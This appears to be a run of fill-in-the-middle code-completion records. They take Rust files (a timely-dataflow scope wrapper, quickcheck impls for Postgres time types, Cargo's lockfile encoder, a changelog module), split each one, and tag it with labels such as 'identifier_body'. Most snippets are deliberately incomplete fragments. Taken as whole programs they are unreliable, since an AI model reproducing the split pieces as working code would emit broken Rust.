/// results and is shared between all users of the functionality.
///
/// For `core` usage the feature detection has also been improved and will not be done if e.g.
/// crate is built with `rdrand` instructions enabled globally.
pub mod r0_4_0 {}
/// Crate now works on stable!
///
/// ## Breaking changes
///
/// * Updated to `rand_core = ^0.3`.
pub mod r0_3_0 {}
|
/// Replaced likely unsound use of `core::mem::uninitialized()`.
pub mod r0_5_1 {}
/// ## Breaking changes
///
|
random_line_split
|
scope_wrapper.rs
|
use std::default::Default;
use communication::Communicator;
use progress::frontier::{MutableAntichain, Antichain};
use progress::{Timestamp, Scope};
use progress::nested::Target;
use progress::nested::subgraph::Target::{GraphOutput, ScopeInput};
use progress::count_map::CountMap;
/// Bookkeeping wrapper around one child scope of a subgraph: caches the
/// scope's shape (inputs/outputs), tracks progress guarantees and retained
/// capabilities, and owns the scratch buffers used when exchanging progress
/// information with the scope.
pub struct ScopeWrapper<T: Timestamp> {
    pub name: String, // debug name, formatted as "<scope name>[<index>]"
    pub scope: Option<Box<Scope<T>>>, // the scope itself; set to None once it shuts down
    index: u64, // position of this child within the parent subgraph
    pub inputs: u64, // cached information about inputs
    pub outputs: u64, // cached information about outputs
    pub edges: Vec<Vec<Target>>, // per-output: downstream targets of each output port
    pub notify: bool, // whether the scope asked to be notified of external progress
    pub summary: Vec<Vec<Antichain<T::Summary>>>, // internal path summaries (input x output)
    pub guarantees: Vec<MutableAntichain<T>>, // per-input: guarantee made by parent scope in inputs
    pub capabilities: Vec<MutableAntichain<T>>, // per-output: capabilities retained by scope on outputs
    pub outstanding_messages: Vec<MutableAntichain<T>>, // per-input: counts of messages on each input
    internal_progress: Vec<CountMap<T>>, // per-output: temp buffer used to ask about internal progress
    consumed_messages: Vec<CountMap<T>>, // per-input: temp buffer used to ask about consumed messages
    produced_messages: Vec<CountMap<T>>, // per-output: temp buffer used to ask about produced messages
    pub guarantee_changes: Vec<CountMap<T>>, // per-input: temp storage for changes in some guarantee...
}
impl<T: Timestamp> ScopeWrapper<T> {
    /// Wraps `scope` as child number `index`, caching its input/output counts
    /// and internal path summaries, and sizing all per-port buffers.
    ///
    /// Panics (via the asserts) if the scope's reported summary shape does
    /// not match its declared number of inputs and outputs.
    pub fn new(mut scope: Box<Scope<T>>, index: u64, _path: String) -> ScopeWrapper<T> {
        let inputs = scope.inputs();
        let outputs = scope.outputs();
        let notify = scope.notify_me();
        // `work` is the scope's initial internal capability counts, one
        // CountMap per output, to be folded into `capabilities` below.
        let (summary, work) = scope.get_internal_summary();
        assert!(summary.len() as u64 == inputs);
        assert!(!summary.iter().any(|x| x.len() as u64!= outputs));
        let mut result = ScopeWrapper {
            name: format!("{}[{}]", scope.name(), index),
            scope: Some(scope),
            index: index,
            inputs: inputs,
            outputs: outputs,
            edges: vec![Default::default(); outputs as usize],
            notify: notify,
            summary: summary,
            guarantees: vec![Default::default(); inputs as usize],
            capabilities: vec![Default::default(); outputs as usize],
            outstanding_messages: vec![Default::default(); inputs as usize],
            internal_progress: vec![CountMap::new(); outputs as usize],
            consumed_messages: vec![CountMap::new(); inputs as usize],
            produced_messages: vec![CountMap::new(); outputs as usize],
            guarantee_changes: vec![CountMap::new(); inputs as usize],
        };
        // Seed each output's capability frontier from the scope's initial
        // internal work; the change callback is a no-op on purpose.
        // TODO : Gross. Fix.
        for (index, capability) in result.capabilities.iter_mut().enumerate() {
            capability.update_iter_and(work[index].elements().iter().map(|x|x.clone()), |_, _| {});
        }
        return result;
    }
pub fn set_external_summary(&mut self, summaries: Vec<Vec<Antichain<T::Summary>>>, frontier: &mut [CountMap<T>]) {
self.scope.as_mut().map(|scope| scope.set_external_summary(summaries, frontier));
}
pub fn push_pointstamps(&mut self, external_progress: &[CountMap<T>]) {
assert!(self.scope.is_some() || external_progress.iter().all(|x| x.len() == 0));
if self.notify && external_progress.iter().any(|x| x.len() > 0) {
for input_port in (0..self.inputs as usize) {
self.guarantees[input_port]
.update_into_cm(&external_progress[input_port], &mut self.guarantee_changes[input_port]);
}
// push any changes to the frontier to the subgraph.
if self.guarantee_changes.iter().any(|x| x.len() > 0) {
let changes = &mut self.guarantee_changes;
self.scope.as_mut().map(|scope| scope.push_external_progress(changes));
// TODO : Shouldn't be necessary
// for change in self.guarantee_changes.iter_mut() { change.clear(); }
debug_assert!(!changes.iter().any(|x| x.len() > 0));
}
}
}
pub fn pull_pointstamps<A: FnMut(u64,T,i64)->()>(&mut self,
pointstamp_messages: &mut CountMap<(u64, u64, T)>,
pointstamp_internal: &mut CountMap<(u64, u64, T)>,
mut output_action: A) -> bool {
let active = {
if let &mut Some(ref mut scope) = &mut self.scope {
scope.pull_internal_progress(&mut self.internal_progress,
&mut self.consumed_messages,
&mut self.produced_messages)
}
else { false }
};
// shutting down if nothing left to do
if self.scope.is_some() &&
!active &&
self.notify && // we don't track guarantees and capabilities for non-notify scopes. bug?
self.guarantees.iter().all(|guarantee| guarantee.empty()) &&
self.capabilities.iter().all(|capability| capability.empty()) {
// println!("Shutting down {}", self.name);
self.scope = None;
self.name = format!("{}(tombstone)", self.name);
}
// for each output: produced messages and internal progress
for output in (0..self.outputs as usize) {
while let Some((time, delta)) = self.produced_messages[output].pop() {
for &target in self.edges[output].iter() {
match target {
ScopeInput(tgt, tgt_in) => { pointstamp_messages.update(&(tgt, tgt_in, time), delta); },
GraphOutput(graph_output) => { output_action(graph_output, time, delta); },
}
}
}
while let Some((time, delta)) = self.internal_progress[output as usize].pop() {
pointstamp_internal.update(&(self.index, output as u64, time), delta);
}
}
// for each input: consumed messages
for input in (0..self.inputs as usize) {
while let Some((time, delta)) = self.consumed_messages[input as usize].pop() {
pointstamp_messages.update(&(self.index, input as u64, time), -delta);
}
}
return active;
}
pub fn add_edge(&mut self, output: u64, target: Target) { self.edges[output as usize].push(target); }
|
pub fn name(&self) -> String { self.name.clone() }
}
|
random_line_split
|
|
scope_wrapper.rs
|
use std::default::Default;
use communication::Communicator;
use progress::frontier::{MutableAntichain, Antichain};
use progress::{Timestamp, Scope};
use progress::nested::Target;
use progress::nested::subgraph::Target::{GraphOutput, ScopeInput};
use progress::count_map::CountMap;
pub struct ScopeWrapper<T: Timestamp> {
pub name: String,
pub scope: Option<Box<Scope<T>>>, // the scope itself
index: u64,
pub inputs: u64, // cached information about inputs
pub outputs: u64, // cached information about outputs
pub edges: Vec<Vec<Target>>,
pub notify: bool,
pub summary: Vec<Vec<Antichain<T::Summary>>>, // internal path summaries (input x output)
pub guarantees: Vec<MutableAntichain<T>>, // per-input: guarantee made by parent scope in inputs
pub capabilities: Vec<MutableAntichain<T>>, // per-output: capabilities retained by scope on outputs
pub outstanding_messages: Vec<MutableAntichain<T>>, // per-input: counts of messages on each input
internal_progress: Vec<CountMap<T>>, // per-output: temp buffer used to ask about internal progress
consumed_messages: Vec<CountMap<T>>, // per-input: temp buffer used to ask about consumed messages
produced_messages: Vec<CountMap<T>>, // per-output: temp buffer used to ask about produced messages
pub guarantee_changes: Vec<CountMap<T>>, // per-input: temp storage for changes in some guarantee...
}
impl<T: Timestamp> ScopeWrapper<T> {
pub fn
|
(mut scope: Box<Scope<T>>, index: u64, _path: String) -> ScopeWrapper<T> {
let inputs = scope.inputs();
let outputs = scope.outputs();
let notify = scope.notify_me();
let (summary, work) = scope.get_internal_summary();
assert!(summary.len() as u64 == inputs);
assert!(!summary.iter().any(|x| x.len() as u64!= outputs));
let mut result = ScopeWrapper {
name: format!("{}[{}]", scope.name(), index),
scope: Some(scope),
index: index,
inputs: inputs,
outputs: outputs,
edges: vec![Default::default(); outputs as usize],
notify: notify,
summary: summary,
guarantees: vec![Default::default(); inputs as usize],
capabilities: vec![Default::default(); outputs as usize],
outstanding_messages: vec![Default::default(); inputs as usize],
internal_progress: vec![CountMap::new(); outputs as usize],
consumed_messages: vec![CountMap::new(); inputs as usize],
produced_messages: vec![CountMap::new(); outputs as usize],
guarantee_changes: vec![CountMap::new(); inputs as usize],
};
// TODO : Gross. Fix.
for (index, capability) in result.capabilities.iter_mut().enumerate() {
capability.update_iter_and(work[index].elements().iter().map(|x|x.clone()), |_, _| {});
}
return result;
}
pub fn set_external_summary(&mut self, summaries: Vec<Vec<Antichain<T::Summary>>>, frontier: &mut [CountMap<T>]) {
self.scope.as_mut().map(|scope| scope.set_external_summary(summaries, frontier));
}
pub fn push_pointstamps(&mut self, external_progress: &[CountMap<T>]) {
assert!(self.scope.is_some() || external_progress.iter().all(|x| x.len() == 0));
if self.notify && external_progress.iter().any(|x| x.len() > 0) {
for input_port in (0..self.inputs as usize) {
self.guarantees[input_port]
.update_into_cm(&external_progress[input_port], &mut self.guarantee_changes[input_port]);
}
// push any changes to the frontier to the subgraph.
if self.guarantee_changes.iter().any(|x| x.len() > 0) {
let changes = &mut self.guarantee_changes;
self.scope.as_mut().map(|scope| scope.push_external_progress(changes));
// TODO : Shouldn't be necessary
// for change in self.guarantee_changes.iter_mut() { change.clear(); }
debug_assert!(!changes.iter().any(|x| x.len() > 0));
}
}
}
pub fn pull_pointstamps<A: FnMut(u64,T,i64)->()>(&mut self,
pointstamp_messages: &mut CountMap<(u64, u64, T)>,
pointstamp_internal: &mut CountMap<(u64, u64, T)>,
mut output_action: A) -> bool {
let active = {
if let &mut Some(ref mut scope) = &mut self.scope {
scope.pull_internal_progress(&mut self.internal_progress,
&mut self.consumed_messages,
&mut self.produced_messages)
}
else { false }
};
// shutting down if nothing left to do
if self.scope.is_some() &&
!active &&
self.notify && // we don't track guarantees and capabilities for non-notify scopes. bug?
self.guarantees.iter().all(|guarantee| guarantee.empty()) &&
self.capabilities.iter().all(|capability| capability.empty()) {
// println!("Shutting down {}", self.name);
self.scope = None;
self.name = format!("{}(tombstone)", self.name);
}
// for each output: produced messages and internal progress
for output in (0..self.outputs as usize) {
while let Some((time, delta)) = self.produced_messages[output].pop() {
for &target in self.edges[output].iter() {
match target {
ScopeInput(tgt, tgt_in) => { pointstamp_messages.update(&(tgt, tgt_in, time), delta); },
GraphOutput(graph_output) => { output_action(graph_output, time, delta); },
}
}
}
while let Some((time, delta)) = self.internal_progress[output as usize].pop() {
pointstamp_internal.update(&(self.index, output as u64, time), delta);
}
}
// for each input: consumed messages
for input in (0..self.inputs as usize) {
while let Some((time, delta)) = self.consumed_messages[input as usize].pop() {
pointstamp_messages.update(&(self.index, input as u64, time), -delta);
}
}
return active;
}
pub fn add_edge(&mut self, output: u64, target: Target) { self.edges[output as usize].push(target); }
pub fn name(&self) -> String { self.name.clone() }
}
|
new
|
identifier_name
|
scope_wrapper.rs
|
use std::default::Default;
use communication::Communicator;
use progress::frontier::{MutableAntichain, Antichain};
use progress::{Timestamp, Scope};
use progress::nested::Target;
use progress::nested::subgraph::Target::{GraphOutput, ScopeInput};
use progress::count_map::CountMap;
pub struct ScopeWrapper<T: Timestamp> {
pub name: String,
pub scope: Option<Box<Scope<T>>>, // the scope itself
index: u64,
pub inputs: u64, // cached information about inputs
pub outputs: u64, // cached information about outputs
pub edges: Vec<Vec<Target>>,
pub notify: bool,
pub summary: Vec<Vec<Antichain<T::Summary>>>, // internal path summaries (input x output)
pub guarantees: Vec<MutableAntichain<T>>, // per-input: guarantee made by parent scope in inputs
pub capabilities: Vec<MutableAntichain<T>>, // per-output: capabilities retained by scope on outputs
pub outstanding_messages: Vec<MutableAntichain<T>>, // per-input: counts of messages on each input
internal_progress: Vec<CountMap<T>>, // per-output: temp buffer used to ask about internal progress
consumed_messages: Vec<CountMap<T>>, // per-input: temp buffer used to ask about consumed messages
produced_messages: Vec<CountMap<T>>, // per-output: temp buffer used to ask about produced messages
pub guarantee_changes: Vec<CountMap<T>>, // per-input: temp storage for changes in some guarantee...
}
impl<T: Timestamp> ScopeWrapper<T> {
pub fn new(mut scope: Box<Scope<T>>, index: u64, _path: String) -> ScopeWrapper<T> {
let inputs = scope.inputs();
let outputs = scope.outputs();
let notify = scope.notify_me();
let (summary, work) = scope.get_internal_summary();
assert!(summary.len() as u64 == inputs);
assert!(!summary.iter().any(|x| x.len() as u64!= outputs));
let mut result = ScopeWrapper {
name: format!("{}[{}]", scope.name(), index),
scope: Some(scope),
index: index,
inputs: inputs,
outputs: outputs,
edges: vec![Default::default(); outputs as usize],
notify: notify,
summary: summary,
guarantees: vec![Default::default(); inputs as usize],
capabilities: vec![Default::default(); outputs as usize],
outstanding_messages: vec![Default::default(); inputs as usize],
internal_progress: vec![CountMap::new(); outputs as usize],
consumed_messages: vec![CountMap::new(); inputs as usize],
produced_messages: vec![CountMap::new(); outputs as usize],
guarantee_changes: vec![CountMap::new(); inputs as usize],
};
// TODO : Gross. Fix.
for (index, capability) in result.capabilities.iter_mut().enumerate() {
capability.update_iter_and(work[index].elements().iter().map(|x|x.clone()), |_, _| {});
}
return result;
}
pub fn set_external_summary(&mut self, summaries: Vec<Vec<Antichain<T::Summary>>>, frontier: &mut [CountMap<T>]) {
self.scope.as_mut().map(|scope| scope.set_external_summary(summaries, frontier));
}
pub fn push_pointstamps(&mut self, external_progress: &[CountMap<T>])
|
}
pub fn pull_pointstamps<A: FnMut(u64,T,i64)->()>(&mut self,
pointstamp_messages: &mut CountMap<(u64, u64, T)>,
pointstamp_internal: &mut CountMap<(u64, u64, T)>,
mut output_action: A) -> bool {
let active = {
if let &mut Some(ref mut scope) = &mut self.scope {
scope.pull_internal_progress(&mut self.internal_progress,
&mut self.consumed_messages,
&mut self.produced_messages)
}
else { false }
};
// shutting down if nothing left to do
if self.scope.is_some() &&
!active &&
self.notify && // we don't track guarantees and capabilities for non-notify scopes. bug?
self.guarantees.iter().all(|guarantee| guarantee.empty()) &&
self.capabilities.iter().all(|capability| capability.empty()) {
// println!("Shutting down {}", self.name);
self.scope = None;
self.name = format!("{}(tombstone)", self.name);
}
// for each output: produced messages and internal progress
for output in (0..self.outputs as usize) {
while let Some((time, delta)) = self.produced_messages[output].pop() {
for &target in self.edges[output].iter() {
match target {
ScopeInput(tgt, tgt_in) => { pointstamp_messages.update(&(tgt, tgt_in, time), delta); },
GraphOutput(graph_output) => { output_action(graph_output, time, delta); },
}
}
}
while let Some((time, delta)) = self.internal_progress[output as usize].pop() {
pointstamp_internal.update(&(self.index, output as u64, time), delta);
}
}
// for each input: consumed messages
for input in (0..self.inputs as usize) {
while let Some((time, delta)) = self.consumed_messages[input as usize].pop() {
pointstamp_messages.update(&(self.index, input as u64, time), -delta);
}
}
return active;
}
pub fn add_edge(&mut self, output: u64, target: Target) { self.edges[output as usize].push(target); }
pub fn name(&self) -> String { self.name.clone() }
}
|
{
assert!(self.scope.is_some() || external_progress.iter().all(|x| x.len() == 0));
if self.notify && external_progress.iter().any(|x| x.len() > 0) {
for input_port in (0..self.inputs as usize) {
self.guarantees[input_port]
.update_into_cm(&external_progress[input_port], &mut self.guarantee_changes[input_port]);
}
// push any changes to the frontier to the subgraph.
if self.guarantee_changes.iter().any(|x| x.len() > 0) {
let changes = &mut self.guarantee_changes;
self.scope.as_mut().map(|scope| scope.push_external_progress(changes));
// TODO : Shouldn't be necessary
// for change in self.guarantee_changes.iter_mut() { change.clear(); }
debug_assert!(!changes.iter().any(|x| x.len() > 0));
}
}
|
identifier_body
|
scope_wrapper.rs
|
use std::default::Default;
use communication::Communicator;
use progress::frontier::{MutableAntichain, Antichain};
use progress::{Timestamp, Scope};
use progress::nested::Target;
use progress::nested::subgraph::Target::{GraphOutput, ScopeInput};
use progress::count_map::CountMap;
pub struct ScopeWrapper<T: Timestamp> {
pub name: String,
pub scope: Option<Box<Scope<T>>>, // the scope itself
index: u64,
pub inputs: u64, // cached information about inputs
pub outputs: u64, // cached information about outputs
pub edges: Vec<Vec<Target>>,
pub notify: bool,
pub summary: Vec<Vec<Antichain<T::Summary>>>, // internal path summaries (input x output)
pub guarantees: Vec<MutableAntichain<T>>, // per-input: guarantee made by parent scope in inputs
pub capabilities: Vec<MutableAntichain<T>>, // per-output: capabilities retained by scope on outputs
pub outstanding_messages: Vec<MutableAntichain<T>>, // per-input: counts of messages on each input
internal_progress: Vec<CountMap<T>>, // per-output: temp buffer used to ask about internal progress
consumed_messages: Vec<CountMap<T>>, // per-input: temp buffer used to ask about consumed messages
produced_messages: Vec<CountMap<T>>, // per-output: temp buffer used to ask about produced messages
pub guarantee_changes: Vec<CountMap<T>>, // per-input: temp storage for changes in some guarantee...
}
impl<T: Timestamp> ScopeWrapper<T> {
pub fn new(mut scope: Box<Scope<T>>, index: u64, _path: String) -> ScopeWrapper<T> {
let inputs = scope.inputs();
let outputs = scope.outputs();
let notify = scope.notify_me();
let (summary, work) = scope.get_internal_summary();
assert!(summary.len() as u64 == inputs);
assert!(!summary.iter().any(|x| x.len() as u64!= outputs));
let mut result = ScopeWrapper {
name: format!("{}[{}]", scope.name(), index),
scope: Some(scope),
index: index,
inputs: inputs,
outputs: outputs,
edges: vec![Default::default(); outputs as usize],
notify: notify,
summary: summary,
guarantees: vec![Default::default(); inputs as usize],
capabilities: vec![Default::default(); outputs as usize],
outstanding_messages: vec![Default::default(); inputs as usize],
internal_progress: vec![CountMap::new(); outputs as usize],
consumed_messages: vec![CountMap::new(); inputs as usize],
produced_messages: vec![CountMap::new(); outputs as usize],
guarantee_changes: vec![CountMap::new(); inputs as usize],
};
// TODO : Gross. Fix.
for (index, capability) in result.capabilities.iter_mut().enumerate() {
capability.update_iter_and(work[index].elements().iter().map(|x|x.clone()), |_, _| {});
}
return result;
}
pub fn set_external_summary(&mut self, summaries: Vec<Vec<Antichain<T::Summary>>>, frontier: &mut [CountMap<T>]) {
self.scope.as_mut().map(|scope| scope.set_external_summary(summaries, frontier));
}
pub fn push_pointstamps(&mut self, external_progress: &[CountMap<T>]) {
assert!(self.scope.is_some() || external_progress.iter().all(|x| x.len() == 0));
if self.notify && external_progress.iter().any(|x| x.len() > 0) {
for input_port in (0..self.inputs as usize) {
self.guarantees[input_port]
.update_into_cm(&external_progress[input_port], &mut self.guarantee_changes[input_port]);
}
// push any changes to the frontier to the subgraph.
if self.guarantee_changes.iter().any(|x| x.len() > 0) {
let changes = &mut self.guarantee_changes;
self.scope.as_mut().map(|scope| scope.push_external_progress(changes));
// TODO : Shouldn't be necessary
// for change in self.guarantee_changes.iter_mut() { change.clear(); }
debug_assert!(!changes.iter().any(|x| x.len() > 0));
}
}
}
pub fn pull_pointstamps<A: FnMut(u64,T,i64)->()>(&mut self,
pointstamp_messages: &mut CountMap<(u64, u64, T)>,
pointstamp_internal: &mut CountMap<(u64, u64, T)>,
mut output_action: A) -> bool {
let active = {
if let &mut Some(ref mut scope) = &mut self.scope
|
else { false }
};
// shutting down if nothing left to do
if self.scope.is_some() &&
!active &&
self.notify && // we don't track guarantees and capabilities for non-notify scopes. bug?
self.guarantees.iter().all(|guarantee| guarantee.empty()) &&
self.capabilities.iter().all(|capability| capability.empty()) {
// println!("Shutting down {}", self.name);
self.scope = None;
self.name = format!("{}(tombstone)", self.name);
}
// for each output: produced messages and internal progress
for output in (0..self.outputs as usize) {
while let Some((time, delta)) = self.produced_messages[output].pop() {
for &target in self.edges[output].iter() {
match target {
ScopeInput(tgt, tgt_in) => { pointstamp_messages.update(&(tgt, tgt_in, time), delta); },
GraphOutput(graph_output) => { output_action(graph_output, time, delta); },
}
}
}
while let Some((time, delta)) = self.internal_progress[output as usize].pop() {
pointstamp_internal.update(&(self.index, output as u64, time), delta);
}
}
// for each input: consumed messages
for input in (0..self.inputs as usize) {
while let Some((time, delta)) = self.consumed_messages[input as usize].pop() {
pointstamp_messages.update(&(self.index, input as u64, time), -delta);
}
}
return active;
}
pub fn add_edge(&mut self, output: u64, target: Target) { self.edges[output as usize].push(target); }
pub fn name(&self) -> String { self.name.clone() }
}
|
{
scope.pull_internal_progress(&mut self.internal_progress,
&mut self.consumed_messages,
&mut self.produced_messages)
}
|
conditional_block
|
quickcheck_impls.rs
|
extern crate quickcheck;
use self::quickcheck::{Arbitrary, Gen};
use super::{PgDate, PgTime, PgTimestamp, PgInterval};
impl Arbitrary for PgDate {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgDate(i32::arbitrary(g))
}
}
impl Arbitrary for PgTime {
fn arbitrary<G: Gen>(g: &mut G) -> Self
|
}
impl Arbitrary for PgTimestamp {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgTimestamp(i64::arbitrary(g))
}
}
impl Arbitrary for PgInterval {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgInterval {
microseconds: i64::arbitrary(g),
days: i32::arbitrary(g),
months: i32::arbitrary(g),
}
}
}
|
{
let mut time = -1;
while time < 0 {
time = i64::arbitrary(g);
}
PgTime(time)
}
|
identifier_body
|
quickcheck_impls.rs
|
extern crate quickcheck;
use self::quickcheck::{Arbitrary, Gen};
use super::{PgDate, PgTime, PgTimestamp, PgInterval};
|
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgDate(i32::arbitrary(g))
}
}
impl Arbitrary for PgTime {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
let mut time = -1;
while time < 0 {
time = i64::arbitrary(g);
}
PgTime(time)
}
}
impl Arbitrary for PgTimestamp {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgTimestamp(i64::arbitrary(g))
}
}
impl Arbitrary for PgInterval {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgInterval {
microseconds: i64::arbitrary(g),
days: i32::arbitrary(g),
months: i32::arbitrary(g),
}
}
}
|
impl Arbitrary for PgDate {
|
random_line_split
|
quickcheck_impls.rs
|
extern crate quickcheck;
use self::quickcheck::{Arbitrary, Gen};
use super::{PgDate, PgTime, PgTimestamp, PgInterval};
impl Arbitrary for PgDate {
fn
|
<G: Gen>(g: &mut G) -> Self {
PgDate(i32::arbitrary(g))
}
}
impl Arbitrary for PgTime {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
let mut time = -1;
while time < 0 {
time = i64::arbitrary(g);
}
PgTime(time)
}
}
impl Arbitrary for PgTimestamp {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgTimestamp(i64::arbitrary(g))
}
}
impl Arbitrary for PgInterval {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgInterval {
microseconds: i64::arbitrary(g),
days: i32::arbitrary(g),
months: i32::arbitrary(g),
}
}
}
|
arbitrary
|
identifier_name
|
encode.rs
|
use std::collections::{HashMap, BTreeMap};
use regex::Regex;
use rustc_serialize::{Encodable, Encoder, Decodable, Decoder};
use core::{Package, PackageId, SourceId, Workspace};
use util::{CargoResult, Graph, Config};
use super::Resolve;
#[derive(RustcEncodable, RustcDecodable, Debug)]
pub struct EncodableResolve {
package: Option<Vec<EncodableDependency>>,
root: EncodableDependency,
metadata: Option<Metadata>,
}
pub type Metadata = BTreeMap<String, String>;
impl EncodableResolve {
pub fn to_resolve(&self, ws: &Workspace) -> CargoResult<Resolve> {
let path_deps = build_path_deps(ws);
let default = try!(ws.current()).package_id().source_id();
let mut g = Graph::new();
let mut tmp = HashMap::new();
let mut replacements = HashMap::new();
let packages = Vec::new();
let packages = self.package.as_ref().unwrap_or(&packages);
let id2pkgid = |id: &EncodablePackageId| {
to_package_id(&id.name, &id.version, id.source.as_ref(),
default, &path_deps)
};
let dep2pkgid = |dep: &EncodableDependency| {
to_package_id(&dep.name, &dep.version, dep.source.as_ref(),
default, &path_deps)
};
let root = try!(dep2pkgid(&self.root));
let ids = try!(packages.iter().map(&dep2pkgid)
.collect::<CargoResult<Vec<_>>>());
{
let mut register_pkg = |pkgid: &PackageId| {
let precise = pkgid.source_id().precise()
.map(|s| s.to_string());
assert!(tmp.insert(pkgid.clone(), precise).is_none(),
"a package was referenced twice in the lockfile");
g.add(pkgid.clone(), &[]);
};
register_pkg(&root);
for id in ids.iter() {
register_pkg(id);
}
}
{
let mut add_dependencies = |id: &PackageId, pkg: &EncodableDependency|
-> CargoResult<()> {
if let Some(ref replace) = pkg.replace {
let replace = try!(id2pkgid(replace));
let replace_precise = tmp.get(&replace).map(|p| {
replace.with_precise(p.clone())
}).unwrap_or(replace);
replacements.insert(id.clone(), replace_precise);
assert!(pkg.dependencies.is_none());
return Ok(())
}
let deps = match pkg.dependencies {
Some(ref deps) => deps,
None => return Ok(()),
};
for edge in deps.iter() {
let to_depend_on = try!(id2pkgid(edge));
let precise_pkgid =
tmp.get(&to_depend_on)
.map(|p| to_depend_on.with_precise(p.clone()))
.unwrap_or(to_depend_on.clone());
g.link(id.clone(), precise_pkgid);
}
Ok(())
};
try!(add_dependencies(&root, &self.root));
for (id, pkg) in ids.iter().zip(packages) {
try!(add_dependencies(id, pkg));
}
}
Ok(Resolve {
graph: g,
root: root,
features: HashMap::new(),
metadata: self.metadata.clone(),
replacements: replacements,
})
}
}
fn build_path_deps(ws: &Workspace) -> HashMap<String, SourceId> {
// If a crate is *not* a path source, then we're probably in a situation
// such as `cargo install` with a lock file from a remote dependency. In
// that case we don't need to fixup any path dependencies (as they're not
// actually path dependencies any more), so we ignore them.
let members = ws.members().filter(|p| {
p.package_id().source_id().is_path()
}).collect::<Vec<_>>();
let mut ret = HashMap::new();
for member in members.iter() {
ret.insert(member.package_id().name().to_string(),
member.package_id().source_id().clone());
}
for member in members.iter() {
build(member, ws.config(), &mut ret);
}
return ret;
fn build(pkg: &Package,
config: &Config,
ret: &mut HashMap<String, SourceId>) {
let deps = pkg.dependencies()
.iter()
.filter(|d|!ret.contains_key(d.name()))
.map(|d| d.source_id())
.filter(|id| id.is_path())
.filter_map(|id| id.url().to_file_path().ok())
.map(|path| path.join("Cargo.toml"))
.filter_map(|path| Package::for_path(&path, config).ok())
.collect::<Vec<_>>();
for pkg in deps {
ret.insert(pkg.name().to_string(),
pkg.package_id().source_id().clone());
build(&pkg, config, ret);
}
}
}
fn to_package_id(name: &str,
version: &str,
source: Option<&SourceId>,
default_source: &SourceId,
path_sources: &HashMap<String, SourceId>)
-> CargoResult<PackageId> {
let source = source.or(path_sources.get(name)).unwrap_or(default_source);
PackageId::new(name, version, source)
}
#[derive(RustcEncodable, RustcDecodable, Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodableDependency {
name: String,
version: String,
source: Option<SourceId>,
dependencies: Option<Vec<EncodablePackageId>>,
replace: Option<EncodablePackageId>,
}
#[derive(Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodablePackageId {
name: String,
version: String,
source: Option<SourceId>
}
impl Encodable for EncodablePackageId {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut out = format!("{} {}", self.name, self.version);
if let Some(ref s) = self.source {
out.push_str(&format!(" ({})", s.to_url()));
}
out.encode(s)
}
}
impl Decodable for EncodablePackageId {
fn decode<D: Decoder>(d: &mut D) -> Result<EncodablePackageId, D::Error> {
let string: String = try!(Decodable::decode(d));
let regex = Regex::new(r"^([^ ]+) ([^ ]+)(?: \(([^\)]+)\))?$").unwrap();
let captures = regex.captures(&string)
.expect("invalid serialized PackageId");
let name = captures.at(1).unwrap();
let version = captures.at(2).unwrap();
let source = captures.at(3);
let source_id = source.map(|s| SourceId::from_url(s));
Ok(EncodablePackageId {
name: name.to_string(),
version: version.to_string(),
source: source_id
})
}
}
impl Encodable for Resolve {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut ids: Vec<&PackageId> = self.graph.iter().collect();
ids.sort();
let encodable = ids.iter().filter_map(|&id| {
if self.root == *id { return None; }
Some(encodable_resolve_node(id, self))
}).collect::<Vec<EncodableDependency>>();
EncodableResolve {
package: Some(encodable),
root: encodable_resolve_node(&self.root, self),
metadata: self.metadata.clone(),
}.encode(s)
}
}
fn encodable_resolve_node(id: &PackageId, resolve: &Resolve)
-> EncodableDependency {
let (replace, deps) = match resolve.replacement(id) {
Some(id) => {
(Some(encodable_package_id(id)), None)
}
None => {
let mut deps = resolve.graph.edges(id)
.into_iter().flat_map(|a| a)
.map(encodable_package_id)
.collect::<Vec<_>>();
deps.sort();
(None, Some(deps))
}
};
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().clone())
};
EncodableDependency {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
dependencies: deps,
replace: replace,
}
}
|
Some(id.source_id().with_precise(None))
};
EncodablePackageId {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
}
}
|
fn encodable_package_id(id: &PackageId) -> EncodablePackageId {
let source = if id.source_id().is_path() {
None
} else {
|
random_line_split
|
encode.rs
|
use std::collections::{HashMap, BTreeMap};
use regex::Regex;
use rustc_serialize::{Encodable, Encoder, Decodable, Decoder};
use core::{Package, PackageId, SourceId, Workspace};
use util::{CargoResult, Graph, Config};
use super::Resolve;
#[derive(RustcEncodable, RustcDecodable, Debug)]
pub struct EncodableResolve {
package: Option<Vec<EncodableDependency>>,
root: EncodableDependency,
metadata: Option<Metadata>,
}
pub type Metadata = BTreeMap<String, String>;
impl EncodableResolve {
pub fn to_resolve(&self, ws: &Workspace) -> CargoResult<Resolve> {
let path_deps = build_path_deps(ws);
let default = try!(ws.current()).package_id().source_id();
let mut g = Graph::new();
let mut tmp = HashMap::new();
let mut replacements = HashMap::new();
let packages = Vec::new();
let packages = self.package.as_ref().unwrap_or(&packages);
let id2pkgid = |id: &EncodablePackageId| {
to_package_id(&id.name, &id.version, id.source.as_ref(),
default, &path_deps)
};
let dep2pkgid = |dep: &EncodableDependency| {
to_package_id(&dep.name, &dep.version, dep.source.as_ref(),
default, &path_deps)
};
let root = try!(dep2pkgid(&self.root));
let ids = try!(packages.iter().map(&dep2pkgid)
.collect::<CargoResult<Vec<_>>>());
{
let mut register_pkg = |pkgid: &PackageId| {
let precise = pkgid.source_id().precise()
.map(|s| s.to_string());
assert!(tmp.insert(pkgid.clone(), precise).is_none(),
"a package was referenced twice in the lockfile");
g.add(pkgid.clone(), &[]);
};
register_pkg(&root);
